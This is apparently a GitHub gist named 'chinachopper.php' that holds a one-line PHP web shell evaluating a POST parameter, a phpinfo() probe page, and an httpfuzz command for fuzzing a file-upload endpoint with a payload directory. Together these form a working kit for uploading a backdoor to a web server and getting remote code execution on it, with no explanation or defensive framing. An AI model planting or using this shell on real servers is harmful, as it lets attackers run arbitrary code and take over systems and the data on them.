/chinachopper.php Secret
Last active
September 26, 2020 02:46
Star
You must be signed in to star a gist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php @eval($_POST['password']);?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php echo phpinfo(); ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
httpfuzz \ | |
--seed-request uploadPOST.request \ | |
--delay-ms 50 \ | |
--proxy-url http://localhost:8080 \ | |
--multipart-file-name uploaded \ | |
--payload-dir ./payloads |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment